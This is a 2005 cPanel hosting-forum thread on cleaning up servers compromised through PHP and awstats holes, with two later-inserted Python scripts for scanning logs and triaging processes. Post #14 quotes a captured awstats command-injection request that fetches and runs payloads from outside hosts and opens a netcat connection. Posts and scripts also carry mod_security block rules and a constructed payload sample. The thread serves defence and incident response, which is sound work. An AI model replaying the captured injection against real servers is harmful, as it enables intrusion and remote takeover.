#1
04-08-2005, 02:37 AM
amal (Registered User; Join Date: Nov 2003; Location: India; Posts: 153)
Crazy hacker...

Hi,

I have a really weird problem...

He hosted (via hack) his domain on one of our cPanel servers; the place where he hosted his site was /usr/local/apache/.../ . I removed him from the server and he went and hosted it on another of my servers (actually, he tried it on many servers in that IP series). Now, after removing him several times, he has switched to other hosts. I have been watching this site, and it's switching servers very easily. The website in question is http://hothackers.com

I really don't understand how he edits the httpd.conf file (permission 644, owned by root) and adds whatever entries he likes. The kernel on our server is 2.4.29-ow1 (the Openwall kernel is meant to be a secure one), and the kernels are statically compiled (monolithic kernel) to avoid module-level hacking. He has hacked both the Redhat 9 and CentOS servers. cPanel is updated to the latest stable version. Any idea how he's hacking, and how it can be prevented? In the meantime, he doesn't have any problem hosting his site for free anywhere he wants. Luckily, he is not with me anymore; he seems to be on a server hosted by theplanet.

And all his files are under the ownership of bin.

Anyone had any such experiences before? Any ideas would be greatly appreciated.

Regards,
Amal.
#2
04-08-2005, 03:20 AM
anoopkumar (Registered User; Join Date: Feb 2004; Location: India; Posts: 6)
They hacked my server too..

Ohhhhh, hothackers... I remember them very much. They hacked my server as well. No idea how they are doing it.
#3
05-06-2005, 12:29 PM
vincentg (Registered User; Join Date: May 2004; Location: new york; Posts: 80)
Check your domlogs

They get in mostly from holes in PHP apps.
They then install their own shell app and God knows what.

Also check your tmp directories for stuff like .../

I suggest you run securetmp, which helps.
#4
05-06-2005, 05:30 PM
iCARus (Registered User; Join Date: Apr 2003; Posts: 104)
Hmmm... we found 1 weird dir like:

drwx------ 3 nobody nobody 1024 May 1 06:10 .\ /

How to delete that? We have had securetmp from the first day and nothing hacked. But this one is weird.
#5
05-06-2005, 05:35 PM
chirpy (Moderator; Join Date: Jun 2002; Location: Go on, have a guess; Posts: 13,495)
Such files/directories are usually best deleted through SFTP; if you're not careful you can end up wiping your whole server.
__________________
Jonathan Michaelson
cPanel Forum Moderator

Need your cPanel servers secured and tuned?
cPanel Server Configuration, Security, Recovery and Antivirus/AntiSpam Services
Developers of the most effective (and free) Firewall & Security Solution for cPanel Servers - csf
http://www.configserver.com
#6
05-06-2005, 05:38 PM
Jasonbd (Registered User; Join Date: Jan 2004; Location: Texas; Posts: 24)
If this is the only directory in /tmp, you could hit Tab and it will put it in the shell prompt. I have also been able to do cd ".\ /". I usually just rename the directory, then go in there to see what is there, and then remove it.
#7
05-06-2005, 05:57 PM
vincentg (Registered User; Join Date: May 2004; Location: new york; Posts: 80)
It can be deleted, and it's where the main hacker files are located.

It may have a space before or after the name. They sometimes place several spaces after the name.

So you have .../[space] or whatever (where [space] is a space).

Just do rm -fr .../

Make sure you get the line right, else you may erase the wrong thing.

Try the cd command first; if you can cd to it, then you know how to delete it.

You need to do three things fast.
First, get rid of his files.
Reboot the server right after you delete the files.
Last, you need to find the PHP app he used to get in.

This is the hard part.

Look for stuff like mydomain.com/help.php?q=http://somedomain

The hacker passes a domain to the app and it invokes the download of the tools the hacker uses, which wind up in your tmp directory.

If you didn't use the script securetmp, then you may find these files in usr/tmp or var/tmp as well.

Securetmp makes it harder for them to do this stuff but is not 100%, and a good hacker can get around it.

Vin
#8
05-07-2005, 02:49 AM
iCARus (Registered User; Join Date: Apr 2003; Posts: 104)
Hello all.

Yes, it is "/tmp/..\[space]/" and files in it:

Code:
drwx------    3 nobody   nobody       1024 May  1 06:10 ./
drwxrwxrwt    7 root     root       406528 May  7 08:40 ../
-rw-r--r--    1 nobody   nobody        307 Mar 27 11:50 1.users
-rw-r--r--    1 nobody   nobody        393 Mar 27 11:51 2.users
-rw-r--r--    1 nobody   nobody        393 Mar 27 11:52 3.users
-rw-r--r--    1 nobody   nobody         45 Feb  2 14:28 bebe.tgz
-rw-r--r--    1 nobody   nobody         34 Aug 15  2004 LinkEvents
-rw-r--r--    1 nobody   nobody       4008 Mar 27 11:46 mech.set
drwx------    2 nobody   nobody       1024 May  1 06:10 randfiles/
-rwx------    1 nobody   nobody     472230 Aug 15  2004 smbd*
-rwxr-xr-x    1 nobody   nobody         53 Aug 15  2004 start*
and the directory in "/tmp/\[space]./":

Code:
drwx------    3 nobody   nobody       1024 May  7 01:21 ./
drwxrwxrwt    7 root     root       406528 May  7 08:44 ../
-rw-r--r--    1 nobody   nobody        608 May  7 00:00 1.users
-rw-r--r--    1 nobody   nobody        607 May  7 00:00 2.users
-rw-r--r--    1 nobody   nobody        610 May  7 00:00 3.users
-rw-r--r--    1 nobody   nobody         45 Feb  2 14:28 bebe.tgz
-rw-r--r--    1 nobody   nobody      82057 May  7 00:00 JoJo.seen
-rw-r--r--    1 nobody   nobody       2706 May  5 19:51 LinkEvents
-rw-r--r--    1 nobody   nobody       1033 May  7 00:00 mech.levels
-rw-------    1 nobody   nobody          5 May  2 12:25 mech.pid
-rw-r--r--    1 nobody   nobody       1349 May  7 00:00 mech.session
-rw-r--r--    1 nobody   nobody       4008 Mar 27 11:46 mech.set
drwx------    2 nobody   nobody       1024 May  7 01:21 randfiles/
-rwx------    1 nobody   nobody     472230 Aug 15  2004 smbd*
-rwxr-xr-x    1 nobody   nobody         53 Aug 15  2004 start*
-rw-r--r--    1 nobody   nobody      79359 May  7 00:00 TaKe.seen
-rw-r--r--    1 nobody   nobody      82548 May  7 00:00 ToTo.seen
Anyone know anything about it? How do I find the user account from which this was created? It looks like some bot. Hmm

Last edited by iCARus; 05-07-2005 at 03:30 AM.
#9
05-08-2005, 12:17 PM
AndyReed (Registered User; Join Date: May 2004; Location: Minneapolis, MN; Posts: 2,208)
Do you have Chkrootkit and RKhunter installed on your server? Do you also have mod_security?

You need to secure your server before it is too late.
__________________
Andy Reed
Dedicated server hosting, Colocation Services Server Management, and cPanel Licenses
#10
05-08-2005, 12:56 PM
vincentg (Registered User; Join Date: May 2004; Location: new york; Posts: 80)
Delete the directory and files.

Run the script securetmp; this will help.

He is using your server to spread a virus by sending emails out.

You need to now find out how he got in.

Run these commands in a shell and look for any reference to tmp:

cd /usr/local/apache/domlogs

grep "/tmp" *;grep Wget *;grep wget *

You can run them one at a time, like grep "/tmp" *, if you get too much output, or send the output to a file.

You will see something like somefile.php?q=some_url
The URL for some_url is another infected server.
I would send them an email to notify them their server has been hacked.

Hackers use your server to A: break into other servers, B: launch attacks or send virus emails out to hundreds of thousands.

There should be a government agency to crack down on these people, but there is none.
Over time they will get better at hacking and it will create a major problem for the internet.
Most hackers are just in the learning stages at this point; thank god for that.

When they become pros you will have little defense and maybe no defense.

Vin
#11
05-08-2005, 12:57 PM
vincentg (Registered User; Join Date: May 2004; Location: new york; Posts: 80)
Forgot one point: after you delete his files, reboot your server to remove any apps from memory!!!

Very important

Vin
#12
05-08-2005, 02:00 PM
iCARus (Registered User; Join Date: Apr 2003; Posts: 104)
Thank you all for the replies...

1. We have installed Chkrootkit and RKhunter and everything looks OK.
2. If we try to look into domlogs we get the error "-bash: /bin/grep: Argument list too long". Is there any other way to look into over 100 logs?
3. We deleted the created dirs in /tmp.
4. From the first day we have used /tmp secured with securetmp.
#13
05-08-2005, 09:21 PM
vincentg (Registered User; Join Date: May 2004; Location: new york; Posts: 80)
You should be able to run the commands one by one.

grep "/tmp" *

grep wget *

grep Wget *

The first one will most likely show the most info on your hacker.

RKhunter is good to have, but it shows false alarms for a few things.

You can also run this:

find / -type d -name ".*" -print

It will search your whole hard drive for funky entries.
You will get many showing up like ./foldername and some files that begin with a dot.
Those are normal; just look for ones that are not normal looking.

Vin
#14
05-08-2005, 11:31 PM
anup123 (Registered User; Join Date: Mar 2004; Location: This Planet; Posts: 984)
I see frequent appearances of these in domlogs:

/cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20ra-ducu.go.ro%2fb.tgz%3btar%20xzvf%20b.tgz%3bcd%20b%3b.%2fstart%3bcd%20..%3brm%20-rf%20b.tgz%3brm%20-rf%20b%3bwget%20ra-ducu.go.ro%2fnc%3bchmod%20%2bx%20nc%3b.%2fnc%2066.221.209.161%2065000%3bwget%20excalibur.go.ro%2ffirewall%3bchmod%20%2bx%20firewall%3b.%2ffirewall%3bhistory%20-c%20%7c%20 HTTP/1.1" 406 352 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "-" "-"

I do not have awstats activated. This happens on 2 domains very frequently.

406 because of mod_sec

and it's all coming from a cihost IP: 66.221.200.58

Anup
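The grep recipes in posts #10 and #13, the "Argument list too long" error in #12, and Anup's URL-encoded awstats.pl request above all come down to one job: go through every domlog and pull out requests that mention /tmp, a downloader, or a URL handed to a script as a parameter. The following is an added example of that scan in Python; it is not code from this thread, from cPanel, or from any poster. It opens the log files one at a time from Python (so the shell's argument-length limit never applies) and decodes %XX escapes before matching, so a request written as %2ftmp%3bwget%20 is caught where a plain grep "/tmp" * would miss it. The indicator names, the sample log lines, the example.com/example.net file names and the attacker.example host are all constructed for the example.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# Indicators drawn from the thread, matched against the DECODED request path,
# so that encodings such as %2ftmp or wget%20 cannot slip past the check.
INDICATORS = {
    "tmp_reference": re.compile(r"/tmp\b"),
    "downloader": re.compile(r"\b(?:wget|curl|lynx|fetch)\b", re.IGNORECASE),
    "remote_file_include": re.compile(r"[?&][\w\[\]]+=(?:https?|ftp)://", re.IGNORECASE),
    "shell_separators": re.compile(r"[;|`]|\$\("),
    "awstats_configdir": re.compile(r"awstats\.pl\?configdir=", re.IGNORECASE),
}

# Combined log format: the request line is the first quoted field.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)')


def classify_line(line):
    """Return the set of indicator names that match one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return set()
    # Decode twice: a second pass also unwraps double-encoded payloads (%253b).
    request = unquote(unquote(match.group(1)))
    return {name for name, pattern in INDICATORS.items() if pattern.search(request)}


def scan_domlogs(directory):
    """Walk every file under `directory` and return (file, line_no, indicators)
    for each flagged line. Files are opened one at a time from Python, so there
    is no shell glob to exceed ARG_MAX ("Argument list too long")."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in sorted(files):
            with open(os.path.join(root, name), encoding="utf-8", errors="replace") as fh:
                for line_no, line in enumerate(fh, 1):
                    found = classify_line(line)
                    if found:
                        hits.append((name, line_no, found))
    return hits


def build_sample_domlogs():
    """Write a small CONSTRUCTED domlogs directory (cPanel names each log after
    its domain) and return its path. Hosts and payloads are placeholders."""
    directory = tempfile.mkdtemp(prefix="domlogs-")
    samples = {
        "example.com": [
            '10.0.0.5 - - [07/May/2005:08:40:01 -0500] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
            # Remote file inclusion: a URL handed to a PHP script as a parameter
            '10.0.0.9 - - [07/May/2005:08:41:13 -0500] "GET /help.php?q=http://attacker.example/tool.txt HTTP/1.1" 200 88 "-" "Mozilla/4.0"',
        ],
        "example.net": [
            # URL-encoded command injection in the awstats configdir parameter,
            # shortened and with a placeholder host; blocked by mod_security (406)
            '10.0.0.7 - - [07/May/2005:08:42:55 -0500] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20attacker.example%2fb.tgz%3b HTTP/1.1" 406 352 "-" "Mozilla/4.0"',
            '10.0.0.5 - - [07/May/2005:08:43:02 -0500] "GET /images/logo.gif HTTP/1.1" 200 4096 "-" "Mozilla/4.0"',
        ],
    }
    for name, lines in samples.items():
        with open(os.path.join(directory, name), "w", encoding="utf-8") as fh:
            fh.write("\n".join(lines) + "\n")
    return directory


if __name__ == "__main__":
    for name, line_no, found in scan_domlogs(build_sample_domlogs()):
        print(f"{name}:{line_no}: {', '.join(sorted(found))}")
```

On a real server point scan_domlogs at /usr/local/apache/domlogs instead of the sample directory. The decoded-before-match step is the part worth keeping even if you stay with grep: the request in Anup's post contains no literal "/tmp" or "wget " at all, only their percent-encoded forms.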
#15
05-09-2005, 11:58 PM
HostMerit (Registered User; Join Date: Oct 2004; Location: New Jersey, USA; Posts: 160)
Might want to add

SecFilter "tar/x20"
SecFilter "go.ro"
SecFilter "chmod/x20"
SecFilter "wget"
SecFilter "rm/x20-rf"

This should help. Of course, make sure mod_security is active on the servers; also remove that script, and when the process is running, use ps -u nobody to get the PID, then go to /proc/(pid) and ls -al. You may see some virtual linked files pointing to where the files are, usually /dev/shm or /tmp, sometimes /var/spool I've seen, sometimes even /usr/local/apache/proxy. Also cat the process's environment; you might be able to pull a directory from there.

Also, this shouldn't cause any issues with regular sites; he seems to be using the Awstats exploit via script, or he's just uploading a script and calling it that:

SecFilter "awstats.pl"

Since people should be accessing Awstats via cPanel regardless, it shouldn't cause any issues.

Thanks,
Kris
Kris@HostMerit.com
__________________
-Kris
HostMerit
'Web Hosting on Your Terms'
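Kris's procedure for a running process (ps -u nobody, then /proc/(pid), ls -al on its links and cat of its environment), as an added example in Python that automates the same checks; it is not code from this thread or from HostMerit. It reads the exe and cwd links, the fd/* links and the NUL-separated environ file from the procfs layout, and flags any path under the drop directories named in the thread (/tmp, /dev/shm, /var/spool, /usr/local/apache/proxy), any path with a dot-named component such as the "..." and ". " directories discussed above, and an exe link marked "(deleted)", which is what you see when the binary was removed but the process was never restarted (vincentg's reason for the reboot). The proc_root parameter and the fake /proc tree built by build_fake_proc_tree are assumptions made so the example runs offline; against a live host call it with the default /proc.

```python
import os
import tempfile

# Drop locations named in the thread for tools left behind by the intruder.
SUSPECT_DIRS = ("/tmp", "/var/tmp", "/dev/shm", "/var/spool", "/usr/local/apache/proxy")
DELETED_SUFFIX = " (deleted)"


def processes_of_uid(uid=None, proc_root="/proc"):
    """PIDs whose /proc/<pid> entry is owned by `uid` (what `ps -u nobody` lists).
    uid=None means the calling user; pwd.getpwnam("nobody").pw_uid gives the
    uid for the thread's case."""
    if uid is None:
        uid = os.getuid()
    pids = []
    for name in os.listdir(proc_root):
        if name.isdigit() and os.stat(os.path.join(proc_root, name)).st_uid == uid:
            pids.append(int(name))
    return sorted(pids)


def inspect_process(pid, proc_root="/proc"):
    """Read the exe and cwd links, the fd/* links and the NUL-separated environ
    file of one process. Links we may not read (another user's process without
    root) are reported as None or skipped."""
    base = os.path.join(proc_root, str(pid))
    info = {"pid": pid, "exe": None, "cwd": None, "fds": [], "env": {}}
    for key in ("exe", "cwd"):
        try:
            info[key] = os.readlink(os.path.join(base, key))
        except OSError:
            pass
    fd_dir = os.path.join(base, "fd")
    if os.path.isdir(fd_dir):
        for fd in sorted(os.listdir(fd_dir)):
            try:
                info["fds"].append(os.readlink(os.path.join(fd_dir, fd)))
            except OSError:
                pass
    try:
        with open(os.path.join(base, "environ"), "rb") as fh:
            for entry in fh.read().split(b"\0"):
                if b"=" in entry:
                    key, _, value = entry.decode("utf-8", "replace").partition("=")
                    info["env"][key] = value
    except OSError:
        pass
    return info


def _under(path, base):
    return path == base or path.startswith(base + "/")


def triage_process(pid, proc_root="/proc"):
    """Return (info, findings): every path the process exposes that sits in a
    drop directory, has a dot-named component (e.g. "...", ". "), or points at
    a file deleted while the process kept running."""
    info = inspect_process(pid, proc_root)
    candidates = [("exe", info["exe"]), ("cwd", info["cwd"])]
    candidates += [("fd", p) for p in info["fds"]]
    candidates += [("env:" + k, v) for k, v in info["env"].items() if k in ("PWD", "OLDPWD", "HOME")]
    findings = []
    for label, path in candidates:
        if path is None:
            continue
        deleted = path.endswith(DELETED_SUFFIX)
        clean = path[: -len(DELETED_SUFFIX)] if deleted else path
        if deleted:
            findings.append(f"{label} points at a deleted file: {path}")
        if any(_under(clean, d) for d in SUSPECT_DIRS):
            findings.append(f"{label} is inside a drop location: {path}")
        if any(part.startswith(".") and part not in (".", "..") for part in clean.split("/")):
            findings.append(f"{label} has a dot-named path component: {path}")
    return info, findings


def build_fake_proc_tree(pid=4242):
    """CONSTRUCTED procfs-style tree for an offline demonstration: a process
    started from a hidden /tmp directory whose binary has since been removed."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    base = os.path.join(root, str(pid))
    os.makedirs(os.path.join(base, "fd"))
    os.symlink("/tmp/. /smbd" + DELETED_SUFFIX, os.path.join(base, "exe"))
    os.symlink("/tmp/. ", os.path.join(base, "cwd"))
    os.symlink("/dev/null", os.path.join(base, "fd", "0"))
    os.symlink("/dev/shm/mech.pid", os.path.join(base, "fd", "3"))
    with open(os.path.join(base, "environ"), "wb") as fh:
        fh.write(b"PWD=/tmp/. \0PATH=/usr/bin:/bin\0")
    return root


if __name__ == "__main__":
    root = build_fake_proc_tree()
    for pid in processes_of_uid(None, root):
        _info, findings = triage_process(pid, root)
        print(f"pid {pid}:")
        for finding in findings:
            print("  " + finding)
```

Reading another user's exe, cwd and environ entries needs root, which is why the lookups tolerate OSError rather than abort; run it as root (or via sudo) on the live box and iterate over processes_of_uid(pwd.getpwnam("nobody").pw_uid) to cover everything ps -u nobody would show.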
Powered by vBulletin® Version 3.8.2
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
© cPanel Inc